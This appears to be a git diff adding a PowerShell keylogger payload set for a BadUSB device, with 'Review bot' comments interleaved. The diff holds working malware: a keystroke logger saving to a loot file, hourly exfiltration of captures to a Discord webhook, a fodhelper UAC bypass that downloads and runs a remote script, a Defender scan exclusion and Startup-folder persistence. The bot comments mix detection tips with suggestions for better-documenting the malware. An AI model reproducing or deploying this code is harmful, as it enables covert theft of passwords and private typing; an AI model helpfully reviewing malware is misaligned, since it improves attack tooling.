diff --git a/Payloads/Flip-Keylogger/-keys.ps1 b/Payloads/Flip-Keylogger/-keys.ps1 new file mode 100644 index 0000000..282a2cf --- /dev/null +++ b/Payloads/Flip-Keylogger/-keys.ps1 @@ -0,0 +1,62 @@ +function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){ + $signatures = @' + [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] + public static extern short GetAsyncKeyState(int virtualKeyCode); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int GetKeyboardState(byte[] keystate); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int MapVirtualKey(uint uCode, int uMapType); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +'@ + + $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru + + + $null = New-Item -Path $Path -ItemType File -Force + + try + { + Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red + + while ($true) { + Start-Sleep -Milliseconds 40 + + + for ($ascii = 9; $ascii -le 254; $ascii++) { + + $state = $API::GetAsyncKeyState($ascii) + + + if ($state -eq -32767) { + $null = [console]::CapsLock + + + $virtualKey = $API::MapVirtualKey($ascii, 3) + + + $kbstate = New-Object Byte[] 256 + $checkkbstate = $API::GetKeyboardState($kbstate) + + + $mychar = New-Object -TypeName System.Text.StringBuilder + + $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) + + if ($success) + { + + [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) + } + } + } + } + } + finally + { + + #notepad $Path + } +} + +XXXlog diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 new file mode 100644 index 0000000..17d936e --- /dev/null +++ b/Payloads/Flip-Keylogger/-logs.ps1 
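Review bot: `XXXlog` has no header comment stating what it collects: the loop polls `GetAsyncKeyState` every 40 ms and appends every translated key press, typed passwords included, unencrypted to `$env:appdata\-locker\$env:UserName-loot.txt`. A comment such as `# Appends every key press, unencrypted, to $Path; the file is recreated on each start` above the function would say so. For detection, the `Add-Type -MemberDefinition` call with these user32.dll imports appears verbatim in PowerShell script block logging (event ID 4104) when that logging is enabled. The `-locker` directory and the `-loot.txt` suffix are fixed on-disk indicators for triage.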
@@ -0,0 +1,85 @@ +# powershell log scheduler +# created by : C0SM0 +# Modified by : Jakoby + +$Path="$env:appdata\-locker\$env:UserName-loot.txt" + +$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1) + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} +} + +# times logs will be sent [keep in military time] +$logTimes = @( + '00:00:00', + '01:00:00', + '02:00:00', + '03:00:00', + '04:00:00', + '05:00:00', + '06:00:00', + '07:00:00', + '08:00:00', + '09:00:00', + '10:00:00', + '11:00:00', + '12:00:00', + '13:00:00', + '14:00:00', + '15:00:00', + '16:00:00', + '17:00:00', + '18:00:00', + '19:00:00', + '20:00:00', + '21:00:00', + '22:00:00', + '23:00:00' +) + +# sort the times in chronological order +$logTimes = $logTimes | Sort-Object + +# ensure keylogger runs every day +while ($true) { + + # run keylogger for each trigger time + foreach ($t in $logTimes) + { + # checks if time passed already + if((Get-Date) -lt (Get-Date -Date $t)) + { + # sleeps until next time is reached + while ((Get-Date -Date $t) -gt (Get-Date)) + { + # sleeps + (Get-Date -Date $t) - (Get-Date) | Start-Sleep + } + + # runs keylogger + Upload-Discord -file $Path + echo "" > $Path + + + } + } +} diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd new file mode 100644 index 0000000..07c8208 --- /dev/null +++ b/Payloads/Flip-Keylogger/-p.cmd 
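Review bot: The comment `# runs keylogger` above `Upload-Discord -file $Path` is wrong: that call sends the capture file to the webhook URL read from `wh.txt`, and the next line empties the file, so `# upload the capture file to the webhook, then empty it` matches the code. The header `# powershell log scheduler` likewise omits that the script sends the data off the host. The webhook URL sits in clear text in `$env:appdata\-locker\wh.txt`, so it can be recovered during triage of an affected machine. On the detection side, the hourly schedule produces a `curl.exe -F` child of a hidden `powershell.exe` posting a multipart upload, which egress filtering or process-lineage rules can alert on.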
@@ -0,0 +1,3 @@ +@echo off +powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1" +powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1" diff --git a/Payloads/Flip-Keylogger/Keylogger.ps1 b/Payloads/Flip-Keylogger/Keylogger.ps1 deleted file mode 100644 index 84f86ba..0000000 --- a/Payloads/Flip-Keylogger/Keylogger.ps1 +++ /dev/null @@ -1 +0,0 @@ -COMING SOON diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 new file mode 100644 index 0000000..57edda1 --- /dev/null +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -0,0 +1,17 @@ +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt"; + +function s1 { + $user = "$env:COMPUTERNAME\$env:USERNAME" + $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user +if($isAdmin){ + $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; + + } + else{ + Break + } +} + +s1 diff --git a/Payloads/Flip-Keylogger/s2.ps1 b/Payloads/Flip-Keylogger/s2.ps1 new file mode 100644 index 0000000..35f9358 --- /dev/null +++ b/Payloads/Flip-Keylogger/s2.ps1 
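Review bot: In `s1`, the two `reg add` calls under `HKCU\Software\Classes` followed by `fodhelper.exe` carry no comment, although they are the step that changes privilege: they redirect the `ms-settings` handler so that the auto-elevating `fodhelper.exe` runs `$259` without a consent prompt (MITRE ATT&CK T1548.002). A comment such as `# ms-settings CurVer redirect + fodhelper.exe: runs $259 elevated without a UAC prompt` should sit above them. `$259` fetches `s2.ps1` from the `main` branch and pipes it to `iex`, so whatever that branch holds at run time executes elevated. `$dc` is written to `wh.txt` on the second line but is never assigned in this file, so it is presumably set by the caller, and that dependency is also undocumented. Registry auditing on `HKCU\Software\Classes\ms-settings\CurVer` (Sysmon event ID 13) and `fodhelper.exe` spawning `powershell.exe` are commonly used signals for this pattern, and setting UAC to always notify or using standard-user accounts removes the bypass.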
@@ -0,0 +1,7 @@ +Add-MpPreference -ExclusionPath $env:appdata/-locker + +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-p.cmd -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-keys.ps1 -o "$env:appdata\-locker\-keys.ps1" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-logs.ps1 -o "$env:appdata\-locker\-logs.ps1" + +start-process "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
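Review bot: The first line, `Add-MpPreference -ExclusionPath $env:appdata/-locker`, has no comment even though it turns off Microsoft Defender scanning for the directory the remaining lines populate; `# excludes the -locker directory from Defender scanning (needs elevation)` would document it. The three `iwr` calls pull `-p.cmd`, `-keys.ps1` and `-logs.ps1` from the `main` branch, so the files that land on disk are whatever that branch holds at the time. `-p.cmd` is written to the per-user Startup folder, which makes it run at every logon (ATT&CK T1547.001). Defender records the exclusion change as event ID 5007 in its Operational log, and the `DisableLocalAdminMerge` policy setting keeps locally added exclusions from taking effect on managed machines. A new `.cmd` file in the Startup folder that launches `powershell.exe -windowstyle hidden`, as `-p.cmd` does, is a further indicator.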